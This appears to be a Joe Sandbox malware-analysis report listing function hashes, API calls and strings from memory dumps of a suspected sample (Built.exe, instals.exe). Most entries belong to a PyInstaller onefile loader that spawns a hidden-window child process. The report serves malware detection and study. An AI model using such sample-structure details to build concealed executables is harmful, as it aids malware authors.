Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf7349f18a17a3978ac6fc4bd7e579f82a377655a794015eef60207e9ae52db2
Instruction ID: d2a108bf7058b07986148fddbd4d9c8168b424c6fe1ef1b58f92eafa3fa35f64
Opcode Fuzzy Hash: cf7349f18a17a3978ac6fc4bd7e579f82a377655a794015eef60207e9ae52db2
Instruction Fuzzy Hash: B3019EA720D151BD6301C0816A5CBF7672FE1C67313B8A826F80BD6582DA9C47597031

Function 05F00E82 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d5eb17845f392e2d01bd6ef0b55e823bcdd5109c8d1a85b411621cccdfdbaf
Instruction ID: 826d5b0e6647779a4af996e65ead6501d8931818a3529ae28c1911d35f7c7c23
Opcode Fuzzy Hash: 61d5eb17845f392e2d01bd6ef0b55e823bcdd5109c8d1a85b411621cccdfdbaf
Instruction Fuzzy Hash: 960148AB20C252AC6301C0862A5CFFB561FE0C67313B8A826F80BD6582DA9C4B4A3030

Function 05F00EB4 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a613ab238fc3872a856baab053ede6aba5b4c06d25062085631af46634ceae0e
Instruction ID: aafd231155995e65d1c6c2f432dca01de31fb039f9b31f03c57b4af5b75d21fe
Opcode Fuzzy Hash: a613ab238fc3872a856baab053ede6aba5b4c06d25062085631af46634ceae0e
Instruction Fuzzy Hash: 35F0E7EB25D151BC7201C0822B5CBF7461FE0D67322B8A827F84BE5582DA8D4B8A3031

Function 05F00EBF Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9242dcd916629f334447b9c4154c35f046ac443ad86ad9dce445fa6f29c1fc0
Instruction ID: ea02fcbb1919ab5abc0c40cf8d4ac4b0bd29faf4b7abb157e9796a0b843622c7
Opcode Fuzzy Hash: e9242dcd916629f334447b9c4154c35f046ac443ad86ad9dce445fa6f29c1fc0
Instruction Fuzzy Hash: FBF03CEB25C151BCB200C0922B5CBF7461FE1D67316B8A827F80BD4582DA8D4B9A3031

Function 05EE0E44 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a1df0d26ab8f6d3fa8b852381f8a7df1da04a3d945729361e65657e12164385
Instruction ID: c7a9fee0309ba74c2844005d2749501ba92a0427d30849e9506e00201687600b
Opcode Fuzzy Hash: 1a1df0d26ab8f6d3fa8b852381f8a7df1da04a3d945729361e65657e12164385
Instruction Fuzzy Hash: D30170731682149FDF52CD8517444F6376BF797330B205036FC4292061E3E64825F670

Function 05F00EED Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65d68d7f357262c86eb97f374ff33750957d682179e3271c8f0070f55f101e8
Instruction ID: 0d45028a07ebf7ee580b8541ae00a7f04ee9401a66ce29dc335360155e446061
Opcode Fuzzy Hash: a65d68d7f357262c86eb97f374ff33750957d682179e3271c8f0070f55f101e8
Instruction Fuzzy Hash: 9EF0DAEB21D111AC7241D0422B6CBF7461FE0D17323B9E827F80BC45869B9C4B9A3035

Function 05EE0E7A Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571d60cdab74f2372255422e5833c61de1c831890ddae0e9437e0c65881ac27f
Instruction ID: 9d63e1244f8896db69321d777efbfe251a9a59415a895951f87186d4131173be
Opcode Fuzzy Hash: 571d60cdab74f2372255422e5833c61de1c831890ddae0e9437e0c65881ac27f
Instruction Fuzzy Hash: 5CF0AC7762C2249FEB51D95517485F6332BF7D2330B20943BFC81C2861E396092AE1B1

Function 05EE0EB5 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb4fc491b95a0a9594a36373543ee568464b0b2b7a5ed24a75749870684ca8a
Instruction ID: 212854839ecc41108f4424cc13ac78d90ca6686b9fd1d59e14c8386571977b20
Opcode Fuzzy Hash: 5bb4fc491b95a0a9594a36373543ee568464b0b2b7a5ed24a75749870684ca8a
Instruction Fuzzy Hash: 16E04FBB25816CAE6B45CD452B649FB262FEAC1330B20945AFC4682114E3A60C78E271

Function 05EE0EF2 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0f523d76cbc3a1a9d03741904492ce68dfff565e90b20bbacdb0d8cdece78a
Instruction ID: fc8c25ac192d481dcc7a6619843abaef496e5e3b66dd825a0610407ff5ae5048
Opcode Fuzzy Hash: 9f0f523d76cbc3a1a9d03741904492ce68dfff565e90b20bbacdb0d8cdece78a
Instruction Fuzzy Hash: 92E07DEB21C188AFA501D5B43F7C6FB171DD6D1730F107856F946D7182D2D60621C030

Function 05EE0ECB Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717248259.0000000005EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bf489f75ada9735f1b2cea1faab1391d5d409c86a7fe9ef54f9cafe1aa208a
Instruction ID: cec949fe2f116b53859aa6fee1f175c11cc745b5e77246284573fe5fa9fc8a98
Opcode Fuzzy Hash: 29bf489f75ada9735f1b2cea1faab1391d5d409c86a7fe9ef54f9cafe1aa208a
Instruction Fuzzy Hash: 6FD05EBB2AC064AD7104C9453A249F6132FD1E0730760D41BF846C1181E2951929D031

Non-executed Functions

Function 05F003DF Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717289636.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f00000_47SXvEQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b5c58d40f8e4d8307bca0baded34a515d12e680b5e0d5e06b82411448cf851
Instruction ID: fb786f4944f48b61e959e970a05ce593ba519df170f72539f1a4e86c504fe9d8
Opcode Fuzzy Hash: 53b5c58d40f8e4d8307bca0baded34a515d12e680b5e0d5e06b82411448cf851
Instruction Fuzzy Hash: 47F09AAB5EC5619EA34BC155AA4EBFA175FA1D53303E8B913E006C85E19E4C4246B029

Analysis Process: instals.exePID: 3716, Parent PID: 6956COMMON

Executed Functions

Function 00007FF7F1461140 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1842785371.00007FF7F1461000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7F1460000, based on PE: true

Associated: 00000001.00000002.1842678109.00007FF7F1460000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.1842832179.00007FF7F146D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.1842861964.00007FF7F1471000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.1842901641.00007FF7F1472000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.1844805430.00007FF7F1966000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.1844854582.00007FF7F196A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7f1460000_instals.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
Instruction ID: ea513d005fc5f177dee7ac61c6caddbf3cacd89b555ed18b8d25085201c2169f
Opcode Fuzzy Hash: 42430f2344ef8e2c73b5046c9819b9514e03832da236caddbb8b9f06a9f0945f
Instruction Fuzzy Hash: A2B092B0A09209C4E3003F0298412A8A2606B88B88F800030C41C02392CBAD54414BA0

Analysis Process: Built.exePID: 5432, Parent PID: 6956COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	23

Executed Functions

Function 00007FF626648BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648C46

Part of subcall function 00007FF62665A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62665A500

Part of subcall function 00007FF62665878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266587F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648CD6
CreateProcessW.KERNELBASE ref: 00007FF626648D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648D18

Part of subcall function 00007FF626642C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
Part of subcall function 00007FF626642C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
Part of subcall function 00007FF626642C50: MessageBoxW.USER32 ref: 00007FF626642D99

RegisterClassW.USER32 ref: 00007FF626648D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648D7B
CreateWindowExW.USER32 ref: 00007FF626648DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E05
PeekMessageW.USER32 ref: 00007FF626648E29
TranslateMessage.USER32 ref: 00007FF626648E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E41
PeekMessageW.USER32 ref: 00007FF626648E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626648FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF626649009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF626649012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF626643F7F), ref: 00007FF62664901F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF626648D44
CreateProcessW, xrefs: 00007FF626648D27
Failed to create child process!, xrefs: 00007FF626648D20
PyInstaller Onefile Hidden Window, xrefs: 00007FF626648D85

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 49114583f7f9625af0ff0251d2200d444366a34717454b278500218c095fc9e7
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 35D19E32A08A8386EF209F34EC542A97764FB84B58F400239DA5D93AA8DF3DD554DB43

Function 00007FF626641000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to convert DLL search path!, xrefs: 00007FF626643DDC
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF626643D12
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF626643B32
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF626643D35
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF626643EBB
pyi-python-flag, xrefs: 00007FF626643AD6
bye-runtime-tmpdir, xrefs: 00007FF626643B68
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF626643C61
pyi-disable-windowed-traceback, xrefs: 00007FF626643BB2
pyi-contents-directory, xrefs: 00007FF626643B8D
Py_GIL_DISABLED, xrefs: 00007FF626643AF4
Failed to remove temporary directory: %s, xrefs: 00007FF626643FC3
MEI, xrefs: 00007FF626643933
VCRUNTIME140.dll, xrefs: 00007FF626643DB1
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF626643882, 00007FF6266438AF
Failed to start splash screen!, xrefs: 00007FF626643ED4
Failed to load splash screen resources!, xrefs: 00007FF626643E85
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF626643971
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF626643BE8
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF626643EA6
_PYI_SPLASH_IPC, xrefs: 00007FF626643A23, 00007FF626643EF5
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF626643A17, 00007FF626643A2F, 00007FF626643A9B
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6266439DE
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF626643E0A
pkg, xrefs: 00007FF6266439BE
Could not create temporary directory!, xrefs: 00007FF626643CBF
_PYI_ARCHIVE_FILE, xrefs: 00007FF6266438D2, 00007FF6266439FF
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF626643A0B, 00007FF626643CD4, 00007FF626643F6B

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 5175dd211561270c01c090de14ed05897007262ae42d5fb09ddae339d6dfd05a
Instruction ID: a0bc54d492fb74ba83bbc9bbfa4fd83e747064c75617aab85271ba1dba420f5f
Opcode Fuzzy Hash: 5175dd211561270c01c090de14ed05897007262ae42d5fb09ddae339d6dfd05a
Instruction Fuzzy Hash: 00329F21A0CA8391FE359B22EC653B96751BF84740F484032DA5DD32D6EFAEE554EB03

Function 00007FF6266669D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF626666708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF626666749
Part of subcall function 00007FF626666708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266667C7
Part of subcall function 00007FF626666708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF626666818

CreateFileW.KERNELBASE ref: 00007FF626666ADA
CreateFileW.KERNEL32 ref: 00007FF626666B2A
GetLastError.KERNEL32 ref: 00007FF626666B5A
GetFileType.KERNELBASE ref: 00007FF626666B6F
GetLastError.KERNEL32 ref: 00007FF626666B79
CloseHandle.KERNEL32 ref: 00007FF626666BAC
CloseHandle.KERNEL32 ref: 00007FF626666D0F
CreateFileW.KERNEL32 ref: 00007FF626666D44
GetLastError.KERNEL32 ref: 00007FF626666D53

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 2a4b239bc42938db0c29a043dfb3ae7c8c225f3b66a64ed84993c92f0486f759
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 71C1B132B28A4286EF10CF69E8912AC3761FB49B98F115225DE2ED7795CF3ED411D702

Function 00007FF6266483B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF62664841B
RemoveDirectoryW.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF62664849E
DeleteFileW.KERNELBASE(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484BD
FindNextFileW.KERNELBASE(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484CB
FindClose.KERNEL32(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484DC
RemoveDirectoryW.KERNELBASE(?,00007FF626648B09,00007FF626643FA5), ref: 00007FF6266484E5

Strings

%s\*, xrefs: 00007FF6266483E2

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 466e76af0ee52c08d8733a8b641580a35883307bcb1a5e1f87eab11825cf6532
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 9A419121A0CA8395EE309B25EC641B96364FB94794F800236D69DC36C4DF7ED54ADF43

Function 00007FF6266492F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF626649323
FindClose.KERNELBASE ref: 00007FF626649332

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 591a331624e7a7add791163fc94b0685481a0cfaa248aeb4fc6dfbffb7cda6ac
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: B1F0A422A18642C6FB708B60B85876A6350BB85338F040335D96D426D4DF7DD4589F02

Function 00007FF626641950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF626647F80: _fread_nolock.LIBCMT ref: 00007FF62664802A

_fread_nolock.LIBCMT ref: 00007FF626641A1B

Part of subcall function 00007FF626642910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF626641B6A), ref: 00007FF62664295E

Strings

MEI, xrefs: 00007FF626641991
Could not read full TOC!, xrefs: 00007FF626641B55
malloc, xrefs: 00007FF626641B22
Error on file., xrefs: 00007FF626641B8D
Failed to seek to cookie position!, xrefs: 00007FF6266419EE
calloc, xrefs: 00007FF626641A68
fread, xrefs: 00007FF626641A32, 00007FF626641B5C
Could not allocate buffer for TOC!, xrefs: 00007FF626641B1B
Could not allocate memory for archive structure!, xrefs: 00007FF626641A61
fseek, xrefs: 00007FF6266419F5
Failed to read cookie!, xrefs: 00007FF626641A2B

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: ec026736a1cabb0f7ef6b5c1934254d4a8a5e9b6eedc37d057a3adc814f85b90
Instruction ID: 721ca4d310a3b0555481ed9d439471ffb16e80f0896e4e527ae070d2dbcd9d4e
Opcode Fuzzy Hash: ec026736a1cabb0f7ef6b5c1934254d4a8a5e9b6eedc37d057a3adc814f85b90
Instruction Fuzzy Hash: 81819071A0C68786EF20DB24E8612B963A0FF84784F404031D98DD7B86DE7EE585AF43

Function 00007FF626641600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF626641742
Failed to create symbolic link %s!, xrefs: 00007FF626641622
malloc, xrefs: 00007FF626641749
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6266416DA
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6266417CA
fwrite, xrefs: 00007FF6266417D1
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6266416A2
fread, xrefs: 00007FF6266417E6
fseek, xrefs: 00007FF6266416E1
Failed to extract %s: failed to open target file!, xrefs: 00007FF62664165C
fopen, xrefs: 00007FF626641663
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6266417DF

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
